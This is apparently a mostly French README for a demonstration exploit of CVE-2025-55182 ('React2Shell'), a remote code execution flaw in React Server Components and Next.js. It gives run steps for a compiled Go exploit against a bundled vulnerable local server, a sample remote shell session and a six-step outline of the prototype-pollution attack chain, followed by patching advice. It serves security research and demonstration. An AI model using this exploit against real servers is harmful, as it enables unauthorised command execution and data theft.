
This project provides a fully functional demonstration of CVE-2025-55182 (React2Shell) - a critical Remote Code Execution vulnerability in React Server Components and Next.js.
Ce projet fournit une démonstration entièrement fonctionnelle de CVE-2025-55182 (React2Shell) - une vulnérabilité critique d'exécution de code à distance dans les composants serveur React et Next.js.
Statut : ✅ FONCTIONNEL - Permet l'exécution réelle de commandes sur des serveurs vulnérables
CVE-2025-55182 (exécutable compilé de 7.8 Mo)📥 Télécharger la vidéo de démo (5.6 Mo) - Cliquez pour télécharger et voir l'exploit en action
Ce que montre la démo :
cd exploited-server
npm run dev
# Le serveur démarre sur http://localhost:3001
cd /Users/subh/Desktop/code-playground/react-2-shell-demo
./CVE-2025-55182
# Lorsque demandé :
Target: localhost:3001
Commandes de base :
subh@rce $ whoami
subh@rce $ pwd
subh@rce $ ls -la
subh@rce $ hostname
Opérations sur les fichiers :
subh@rce $ touch hello.txt
[+] Créé : hello.txt
subh@rce $ vi hello.txt
[i] Entrez le nouveau contenu (tapez 'EOF' sur une ligne seule pour terminer) :
Hello World!
EOF
[+] Fichier sauvegardé : hello.txt
subh@rce $ cat hello.txt
Hello World!
subh@rce $ echo "New content" > hello.txt
[+] Fichier écrit
subh@rce $ rm hello.txt
[+] Supprimé : hello.txt
Infos système :
subh@rce $ cat package.json
subh@rce $ node --version
subh@rce $ npm --version
subh@rce $ ps aux
Sortie :
subh@rce $ exit
Ce projet démontre :
✅ Exploitation réelle - RCE fonctionnel sur des systèmes vulnérables
✅ Recherche en sécurité - Comprendre les vulnérabilités des frameworks web modernes
✅ Développement Go - Compilation et utilisation d'outils de sécurité
✅ Analyse de vulnérabilités - Recherche CVE et techniques d'exploitation
✅ Divulgation responsable - Pratiques de tests de sécurité éthiques
react-2-shell-demo/
├── CVE-2025-55182 # Binaire d'exploit Go compilé
├── main.go # Code source Go
├── exploited-server/ # Application Next.js vulnérable
│ ├── app/
│ │ ├── actions.ts # Actions serveur (vulnérable)
│ │ └── page.tsx # Interface utilisateur d'avertissement
│ └── package.json # Next 15.0.1, React 19.0.0
└── *.md # Documentation
CVE-2025-55182 exploite une désérialisation non sécurisée dans les composants serveur React :
__proto__Function()1. Fabriquer une charge multipart avec des chunks malveillants
2. Envoyer au point de terminaison Actions serveur de Next.js
3. Déclencher la pollution de prototype via __proto__:then
4. Invoquer le constructeur Function() avec la commande
5. Exécuter le code et retourner la sortie via une redirection
6. Analyser le résultat depuis l'en-tête X-Action-Redirect
AVIS CRITIQUES :
README.md - Ce fichierGO_EXPLOIT_USAGE.md - Utilisation détaillée de l'exploitVULNERABLE_SERVER.md - Guide de configuration du serveurEXPLOITATION_GUIDE.md - Analyse technique approfondieUSAGE.md - Exemples d'utilisation et commandesnpm run dev dans exploited-server)./CVE-2025-55182)Ce projet démontre avec succès :
Pour les systèmes de production :
Mettre à jour immédiatement vers les versions corrigées :
Rotation des secrets s'ils ont été exposés avant le 4 décembre 2025
Surveiller les journaux pour toute activité suspecte d'Actions serveur
Auditer les applications utilisant des composants serveur
@subhdotsol - À des fins éducatives et de recherche en sécurité
Ce code est destiné uniquement à des tests de sécurité éducatifs et autorisés.
Rappel : Obtenez toujours une autorisation appropriée avant de tester. Utilisez de manière responsable ! 🔒